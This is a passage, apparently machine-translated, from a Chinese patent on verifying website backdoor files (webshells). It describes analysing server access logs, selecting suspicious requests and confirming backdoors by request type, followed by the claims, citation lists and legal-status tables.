Mode;Authentication module 40, verifies that the text of record access is asked in internet access to be verified for the verification mode by selection
Whether part is website backdoor file.
Alternatively, Fig. 4 is the structured flowchart of the checking device of website backdoor file according to the preferred embodiment of the invention.Such as
Shown in Fig. 4, analysis module 20 can include:Resolution unit 200, for using communication protocol to being wrapped in network access log recording
The whole internet access request record contained carries out piecewise analytic one by one;First determining unit 202, for by the request after parsing
Include the interconnection of the code segment performed by website backdoor file and/or the fixed field set in communication protocol in body matter
Net access request record is defined as internet access request record to be verified.
Alternatively, as shown in figure 4, choosing module 30 can include:First extraction unit 300, for be verified mutual
URL is extracted in the request row of internet interview request record;Second determining unit 302, for the suffix portion included according to URL
Content determines request type;Unit 304 is chosen, for being chosen according to request type for internet access request record to be verified
Verification mode.
Alternatively, as shown in figure 4, authentication module 40 can include:Second extraction unit 400, for be verified mutual
Extracted in internet interview request record and access connection password used in respective file;Searching unit 402, in request type
In the case of for PHP types or ASP types, searched from internet access request record to be verified corresponding with connection password
Executable code section;Generation unit 404, for running executable code section, generation fortune according to default calculation
Calculate result;3rd determining unit 406, for when operation result is consistent with default result, determining that internet to be verified is visited
The file for asking request record access is website backdoor file.
Alternatively, authentication module 40 can include:Second extraction unit 400, for being asked from internet access to be verified
Ask to extract in record and access connection password used in respective file;Searching unit 402, for being JSP types in request type
In the case of, search executable code section corresponding with connection password from internet access request record to be verified;
Generation unit 404, for running executable code section according to specified command function, generation shows result;3rd determines
Unit 406, for when showing that result meets the functional characteristic of command function, determining internet access request record to be verified
The file of access is website backdoor file.
Embodiment 3
Embodiments of the invention can provide a kind of terminal, the terminal can be terminal group in
Any one computer terminal.Alternatively, in the present embodiment, above computer terminal can also replace with mobile whole
The terminal devices such as end.
Alternatively, in the present embodiment, above computer terminal can be located in multiple network equipments of computer network
At least one network equipment.
Alternatively, Fig. 5 is a kind of structured flowchart of terminal according to embodiments of the present invention.As shown in figure 5, the meter
Calculation machine terminal can include:One or more (one is only shown in figure) processors and memory.
Wherein, the website backdoor file that memory can be used in storage software program and module, such as embodiment of the present invention
Verification method and the corresponding programmed instruction/module of device, processor by operation be stored in the software program in memory with
And module, so as to perform various function application and data processing, that is, realize the verification method of above-mentioned website backdoor file.Deposit
Reservoir may include high speed random access memory, can also include nonvolatile memory, such as one or more magnetic storage device,
Flash memory or other non-volatile solid state memories.In some instances, memory can further comprise remote relative to processor
The memory that journey is set, these remote memories can pass through network connection to terminal.The example of above-mentioned network includes but not limited
In internet, intranet, LAN, mobile radio communication and combinations thereof.
Processor can call the information and application program of memory storage by transmitting device, to perform following step:
S1:Obtain network access log recording;
S2:The communication protocol used according to access website backdoor file is analyzed network access log recording, is selected
Internet access to be verified is taken to ask record;
S3:Verification mode is chosen according to the request type that internet access request record to be verified is belonged to;
S4:Verify that internet access to be verified asks whether the file of record access is net by the verification mode of selection
Stand backdoor file.
Optionally, above-mentioned processor can also carry out the program code of following steps:Using communication protocol to network access
The whole internet access request record included in log recording carries out piecewise analytic one by one;By the request body content after parsing
In include the internet access of the code segment performed by website backdoor file and/or the fixed field set in communication protocol please
Record is asked to be defined as internet access request record to be verified.
Optionally, above-mentioned processor can also carry out the program code of following steps:Please from internet access to be verified
Ask and URL (URL) is extracted in the request row of record;The suffix portion content included according to URL determines request class
Type;According to request type verification mode is chosen for internet access request record to be verified.
Optionally, above-mentioned processor can also carry out the program code of following steps:Please from internet access to be verified
Ask to extract in record and access connection password used in respective file;In the situation that request type is PHP types or ASP types
Under, search executable code section corresponding with connection password from internet access request record to be verified;According to pre-
If the executable code section of calculation operation, generates operation result;When operation result is consistent with default result, it is determined that
The file of internet access request record access to be verified is website backdoor file.
Optionally, above-mentioned processor can also carry out the program code of following steps:Please from internet access to be verified
Ask to extract in record and access connection password used in respective file;In the case where request type is JSP types, to be verified
Internet access request record in search with connecting the corresponding executable code section of password;According to specified command function
The executable code section of operation, generation shows result;When showing that result meets the functional characteristic of command function, determine to be tested
The file of the internet access request record access of card is website backdoor file.
Using the embodiment of the present invention, there is provided a kind of proof scheme of website backdoor file.After according to access website
Door file using communication protocol the network access log recording retained on server is analyzed by the way of choose to be tested
The internet access request record of card, and chosen according to the belonged to request type of internet access request record to be verified
Verification mode confirm network backdoor file whether necessary being, so as to be effectively improved what website backdoor file was identified
Success rate, significantly reduces the probability to failing to report or reporting by mistake in website backdoor file progress verification process, and then solve
Mode accuracy that website backdoor file is determined by way of characteristic matching employed in correlation technique is relatively low, is also easy to produce
The technical problem failed to report or reported by mistake.
It will appreciated by the skilled person that the structure shown in Fig. 5 is only signal, terminal can also be intelligence
Can mobile phone (such as Android phone, iOS mobile phones), tablet personal computer, applause computer and mobile internet device (Mobile
Internet Devices, MID), the terminal device such as PAD.Fig. 5 it does not cause to limit to the structure of above-mentioned electronic installation.Example
Such as, terminal may also include the component (such as network interface, display device) more or less than shown in Fig. 5, or
Person has the configuration different from shown in Fig. 5.
One of ordinary skill in the art will appreciate that all or part of step in the various methods of above-described embodiment is can
To be completed by program come the device-dependent hardware of command terminal, the program can be stored in a computer-readable recording medium
In, storage medium can include:Flash disk, read-only storage (Read-Only Memory, ROM), random access device (Random
Access Memory, RAM), disk or CD etc..
Embodiment 4
Embodiments of the invention additionally provide a kind of storage medium.Alternatively, in the present embodiment, above-mentioned storage medium can
For preserving the program code performed by the verification method for the website backdoor file that above-described embodiment one is provided.
Alternatively, in the present embodiment, above-mentioned storage medium can be located in computer network Computer terminal group
In any one terminal, or in any one mobile terminal in mobile terminal group.
Alternatively, in the present embodiment, storage medium is arranged to the program code that storage is used to perform following steps:
S1:Obtain network access log recording;
S2:The communication protocol used according to access website backdoor file is analyzed network access log recording, is selected
Internet access to be verified is taken to ask record;
S3:Verification mode is chosen according to the request type that internet access request record to be verified is belonged to;
S4:Determine that internet access to be verified asks whether the file of record access is net by the verification mode of selection
Stand backdoor file.
Alternatively, in the present embodiment, storage medium is also configured to the program code that storage is used to perform following steps:
Piecewise analytic is carried out using communication protocol one by one to the whole internet access request record included in network access log recording;
It in request body content after parsing will include the code segment performed by website backdoor file and/or set in communication protocol
The internet access request record of fixed field is defined as internet access request record to be verified.
Alternatively, in the present embodiment, storage medium is also configured to the program code that storage is used to perform following steps:
URL (URL) is extracted from the request row of internet access request record to be verified;Included according to URL
Suffix portion content determines request type;According to request type authentication is chosen for internet access request record to be verified
Formula.
Alternatively, in the present embodiment, storage medium is also configured to the program code that storage is used to perform following steps:
Extract to access from internet access request record to be verified and connect password used in respective file;It is in request type
In the case of PHP types or ASP types, being searched from internet access request record to be verified can with connecting that password is corresponding
The code section of execution;Executable code section is run according to default calculation, operation result is generated;When operation result with
When default result is consistent, the file for determining internet access request record access to be verified is website backdoor file.
Alternatively, in the present embodiment, storage medium is also configured to the program code that storage is used to perform following steps:
Extract to access from internet access request record to be verified and connect password used in respective file;It is in request type
In the case of JSP types, executable generation corresponding with connection password is searched from internet access request record to be verified
Code part;According to the executable code section of specified command function operation, generation shows result;When display result meets function
During the functional characteristic of order, the file for determining internet access request record access to be verified is website backdoor file.
The embodiments of the present invention are for illustration only, and the quality of embodiment is not represented.
In the above embodiment of the present invention, the description to each embodiment all emphasizes particularly on different fields, and does not have in some embodiment
The part of detailed description, may refer to the associated description of other embodiment.
In several embodiments provided herein, it should be understood that disclosed technology contents, others can be passed through
Mode is realized.Wherein, device embodiment described above is only schematical, such as division of described unit, is only
A kind of division of logic function, can there is other dividing mode when actually realizing, such as multiple units or component can combine or
Person is desirably integrated into another system, or some features can be ignored, or does not perform.Another, shown or discussed is mutual
Between coupling or direct-coupling or communication connection can be the INDIRECT COUPLING or communication link of unit or module by some interfaces
Connect, can be electrical or other forms.
The unit illustrated as separating component can be or may not be it is physically separate, it is aobvious as unit
The part shown can be or may not be physical location, you can with positioned at a place, or can also be distributed to multiple
On NE.Some or all of unit therein can be selected to realize the mesh of this embodiment scheme according to the actual needs
's.
In addition, each functional unit in each embodiment of the invention can be integrated in a processing unit, can also
That unit is individually physically present, can also two or more units it is integrated in a unit.Above-mentioned integrated list
Member can both be realized in the form of hardware, it would however also be possible to employ the form of SFU software functional unit is realized.
If the integrated unit is realized using in the form of SFU software functional unit and as independent production marketing or used
When, it can be stored in a computer read/write memory medium.Understood based on such, technical scheme is substantially
The part contributed in other words to prior art or all or part of the technical scheme can be in the form of software products
Embody, the computer software product is stored in a storage medium, including some instructions are to cause a computer
Equipment (can for personal computer, server or network equipment etc.) perform each embodiment methods described of the invention whole or
Part steps.And foregoing storage medium includes:USB flash disk, read-only storage (ROM, Read-Only Memory), arbitrary access are deposited
Reservoir (RAM, Random Access Memory), mobile hard disk, magnetic disc or CD etc. are various can be with store program codes
Medium.
Described above is only the preferred embodiment of the present invention, it is noted that for the ordinary skill people of the art
For member, under the premise without departing from the principles of the invention, some improvements and modifications can also be made, these improvements and modifications also should
It is considered as protection scope of the present invention.
Claims (10)
1. a kind of verification method of website backdoor file, it is characterised in that including:
Obtain network access log recording;
The communication protocol used according to access website backdoor file is analyzed the network access log recording, and selection is treated
The internet access request record of checking;
Verification mode is chosen according to the request type that the internet access request record to be verified is belonged to;
By the verification mode of selection verify the internet access to be verified ask record access file whether be
The website backdoor file.
2. according to the method described in claim 1, it is characterised in that according to accessing described in the website backdoor file used
Communication protocol is analyzed the network access log recording, chooses the internet access request record bag to be verified
Include:
The whole internet access request included in the network access log recording is recorded one by one using the communication protocol
Carry out piecewise analytic;
The code segment performed by the website backdoor file and/or the communication will be included in request body content after parsing
The internet access request record of the fixed field set in agreement is defined as the internet access request record to be verified.
3. according to the method described in claim 1, it is characterised in that according to the internet access request record institute to be verified
The request type of ownership, which chooses verification mode, to be included:
Uniform resource position mark URL is extracted from the request row of the internet access request record to be verified;
The suffix portion content included according to the URL determines the request type;
According to the request type verification mode is chosen for the internet access request record to be verified.
4. the method according to claim 1 or 3, it is characterised in that verify described to be verified by the verification mode
Whether the file of internet access request record access is that the website backdoor file includes:
Extract to access from the internet access request record to be verified and connect password used in respective file;
In the case where the request type is PHP types or ASP types, record is asked from the internet access to be verified
Middle lookup executable code section corresponding with the connection password;
The executable code section is run according to default calculation, operation result is generated;
When the operation result is consistent with default result, the internet access request record access to be verified is determined
File is the website backdoor file.
5. the method according to claim 1 or 3, it is characterised in that verify described to be verified by the verification mode
Whether the file of internet access request record access is that the website backdoor file includes:
Extract to access from the internet access request record to be verified and connect password used in respective file;
In the case where the request type is JSP types, searched from the internet access request record to be verified with
It is described to connect the corresponding executable code section of password;
The executable code section is run according to specified command function, generation shows result;
When the display result meets the functional characteristic of the command function, the internet access request to be verified is determined
The file of record access is the website backdoor file.
6. a kind of checking device of website backdoor file, it is characterised in that including:
Acquisition module, for obtaining network access log recording;
Analysis module, the communication protocol for being used according to access website backdoor file is entered to the network access log recording
Row analysis, chooses internet access request record to be verified;
Module is chosen, for choosing authentication according to the belonged to request type of the internet access request record to be verified
Formula;
Authentication module, verifies that record access is asked in the internet access to be verified for the verification mode by selection
File whether be the website backdoor file.
7. device according to claim 6, it is characterised in that the analysis module includes:
Resolution unit, for whole internet access using the communication protocol to being included in the network access log recording
Request record carries out piecewise analytic one by one;
First determining unit, for the generation performed by the website backdoor file will to be included in the request body content after parsing
The internet access request record of the fixed field set in code section and/or the communication protocol is defined as described to be verified mutual
Internet interview request record.
8. device according to claim 6, it is characterised in that the selection module includes:
First extraction unit, determines for extracting unified resource from the request row of the internet access request record to be verified
Position symbol URL;
Second determining unit, the suffix portion content for being included according to the URL determines the request type;
Unit is chosen, for choosing authentication according to the request type for the internet access request record to be verified
Formula.
9. the device according to claim 6 or 8, it is characterised in that the authentication module includes:
Second extraction unit, is used for extracting access respective file from the internet access request record to be verified
Connection password;
Searching unit, in the case of being PHP types or ASP types in the request type, from the interconnection to be verified
Executable code section corresponding with the connection password is searched in net access request record;
Generation unit, for running the executable code section according to default calculation, generates operation result;
3rd determining unit, for when the operation result is consistent with default result, determining the internet to be verified
The file of access request record access is the website backdoor file.
10. the device according to claim 6 or 8, it is characterised in that the authentication module includes:
Second extraction unit, is used for extracting access respective file from the internet access request record to be verified
Connection password;
Searching unit, in the case of being JSP types in the request type, from the internet access request to be verified
Executable code section corresponding with the connection password is searched in record;
Generation unit, for running the executable code section according to specified command function, generation shows result;
3rd determining unit, for when the display result meets the functional characteristic of the command function, determining described to be tested
The file of the internet access request record access of card is the website backdoor file.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201610096648.2A CN107104924B (en) | 2016-02-22 | 2016-02-22 | Verification method and device for website backdoor file |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201610096648.2A CN107104924B (en) | 2016-02-22 | 2016-02-22 | Verification method and device for website backdoor file |
Publications (2)
Publication Number | Publication Date |
---|---|
CN107104924A true CN107104924A (en) | 2017-08-29 |
CN107104924B CN107104924B (en) | 2020-10-09 |
Family
ID=59658691
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201610096648.2A Active CN107104924B (en) | 2016-02-22 | 2016-02-22 | Verification method and device for website backdoor file |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN107104924B (en) |
Cited By (8)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN107911355A (en) * | 2017-11-07 | 2018-04-13 | 杭州安恒信息技术有限公司 | A kind of website back door based on attack chain utilizes event recognition method |
CN109040071A (en) * | 2018-08-06 | 2018-12-18 | 杭州安恒信息技术股份有限公司 | A kind of confirmation method of WEB backdoor attack event |
CN110868410A (en) * | 2019-11-11 | 2020-03-06 | 恒安嘉新(北京)科技股份公司 | Method and device for acquiring webpage Trojan horse connection password, electronic equipment and storage medium |
CN112073418A (en) * | 2020-09-10 | 2020-12-11 | 北京微步在线科技有限公司 | Encrypted flow detection method and device and computer readable storage medium |
CN112182561A (en) * | 2020-09-24 | 2021-01-05 | 百度在线网络技术(北京)有限公司 | Method and device for detecting rear door, electronic equipment and medium |
CN113225357A (en) * | 2021-07-08 | 2021-08-06 | 北京搜狐新媒体信息技术有限公司 | Evidence obtaining method and related device for webpage backdoor |
CN113722639A (en) * | 2021-08-25 | 2021-11-30 | 北京奇艺世纪科技有限公司 | Website access verification method and device, electronic equipment and readable storage medium |
CN114006706A (en) * | 2020-07-13 | 2022-02-01 | 深信服科技股份有限公司 | Network security detection method, system, computer device and readable storage medium |
Citations (5)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US20120005743A1 (en) * | 2010-06-30 | 2012-01-05 | Mitsubishi Electric Corporation | Internal network management system, internal network management method, and program |
CN102426634A (en) * | 2011-10-26 | 2012-04-25 | 中国信息安全测评中心 | Method for finding back door of source code |
US20150256551A1 (en) * | 2012-10-05 | 2015-09-10 | Myoung Hun Kang | Log analysis system and log analysis method for security system |
CN105069355A (en) * | 2015-08-26 | 2015-11-18 | 厦门市美亚柏科信息股份有限公司 | Static detection method and apparatus for webshell deformation |
CN105302707A (en) * | 2014-06-06 | 2016-02-03 | 腾讯科技(深圳)有限公司 | Application vulnerability detection method and apparatus |
-
2016
- 2016-02-22 CN CN201610096648.2A patent/CN107104924B/en active Active
Patent Citations (5)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US20120005743A1 (en) * | 2010-06-30 | 2012-01-05 | Mitsubishi Electric Corporation | Internal network management system, internal network management method, and program |
CN102426634A (en) * | 2011-10-26 | 2012-04-25 | 中国信息安全测评中心 | Method for finding back door of source code |
US20150256551A1 (en) * | 2012-10-05 | 2015-09-10 | Myoung Hun Kang | Log analysis system and log analysis method for security system |
CN105302707A (en) * | 2014-06-06 | 2016-02-03 | 腾讯科技(深圳)有限公司 | Application vulnerability detection method and apparatus |
CN105069355A (en) * | 2015-08-26 | 2015-11-18 | 厦门市美亚柏科信息股份有限公司 | Static detection method and apparatus for webshell deformation |
Non-Patent Citations (1)
Title |
---|
石刘洋: "基于web日志的webshell检测方法研究", 《信息安全研究》 * |
Cited By (14)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN107911355B (en) * | 2017-11-07 | 2020-05-01 | 杭州安恒信息技术股份有限公司 | Website backdoor utilization event identification method based on attack chain |
CN107911355A (en) * | 2017-11-07 | 2018-04-13 | 杭州安恒信息技术有限公司 | A kind of website back door based on attack chain utilizes event recognition method |
CN109040071B (en) * | 2018-08-06 | 2021-02-09 | 杭州安恒信息技术股份有限公司 | Method for confirming WEB backdoor attack event |
CN109040071A (en) * | 2018-08-06 | 2018-12-18 | 杭州安恒信息技术股份有限公司 | A kind of confirmation method of WEB backdoor attack event |
CN110868410A (en) * | 2019-11-11 | 2020-03-06 | 恒安嘉新(北京)科技股份公司 | Method and device for acquiring webpage Trojan horse connection password, electronic equipment and storage medium |
CN110868410B (en) * | 2019-11-11 | 2022-05-10 | 恒安嘉新(北京)科技股份公司 | Method and device for acquiring webpage Trojan horse connection password, electronic equipment and storage medium |
CN114006706A (en) * | 2020-07-13 | 2022-02-01 | 深信服科技股份有限公司 | Network security detection method, system, computer device and readable storage medium |
CN112073418A (en) * | 2020-09-10 | 2020-12-11 | 北京微步在线科技有限公司 | Encrypted flow detection method and device and computer readable storage medium |
CN112073418B (en) * | 2020-09-10 | 2022-01-14 | 北京微步在线科技有限公司 | Encrypted flow detection method and device and computer readable storage medium |
CN112182561A (en) * | 2020-09-24 | 2021-01-05 | 百度在线网络技术(北京)有限公司 | Method and device for detecting rear door, electronic equipment and medium |
CN112182561B (en) * | 2020-09-24 | 2024-04-30 | 百度在线网络技术(北京)有限公司 | Rear door detection method and device, electronic equipment and medium |
CN113225357A (en) * | 2021-07-08 | 2021-08-06 | 北京搜狐新媒体信息技术有限公司 | Evidence obtaining method and related device for webpage backdoor |
CN113722639A (en) * | 2021-08-25 | 2021-11-30 | 北京奇艺世纪科技有限公司 | Website access verification method and device, electronic equipment and readable storage medium |
CN113722639B (en) * | 2021-08-25 | 2023-08-25 | 北京奇艺世纪科技有限公司 | Website access verification method, device, electronic equipment and readable storage medium |
Also Published As
Publication number | Publication date |
---|---|
CN107104924B (en) | 2020-10-09 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
CN107104924A (en) | The verification method and device of website backdoor file | |
CN103607385B (en) | Method and apparatus for security detection based on browser | |
CN103944890B (en) | Virtual interaction system based on customer end/server mode and method | |
CN104468592B (en) | Login method and login system | |
US9264435B2 (en) | Apparatus and methods for access solutions to wireless and wired networks | |
US7293281B1 (en) | Method and system for verifying a client request | |
CN104519050B (en) | Login method and login system | |
CN107016074B (en) | Webpage loading method and device | |
CN102591889A (en) | Method and device for assisting user input based on browser of mobile terminal | |
CN106453216A (en) | Malicious website interception method, malicious website interception device and client | |
CN105939326A (en) | Message processing method and device | |
CN105553999B (en) | Application user behavioural analysis and method of controlling security and its corresponding device | |
CN108696490A (en) | The recognition methods of account permission and device | |
CN106453266A (en) | Abnormal networking request detection method and apparatus | |
CN105302707B (en) | The leak detection method and device of application program | |
CN108810896A (en) | The connection authentication method and device of wireless access point | |
CN105306414A (en) | Port vulnerability detection method, device and system | |
CN103444215A (en) | Methods and apparatuses for avoiding damage in network attacks | |
CN103647652B (en) | A kind of method for realizing data transfer, device and server | |
Kaur et al. | Browser fingerprinting as user tracking technology | |
CN108259457A (en) | A kind of WEB authentication methods and device | |
CN103634111B (en) | Single-point logging method and system and single sign-on client-side | |
CN107332804A (en) | The detection method and device of webpage leak | |
CN105554136B (en) | Backup Data restoring method, apparatus and system | |
CN108924159A (en) | The verification method and device in a kind of message characteristic identification library |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||
GR01 | Patent grant |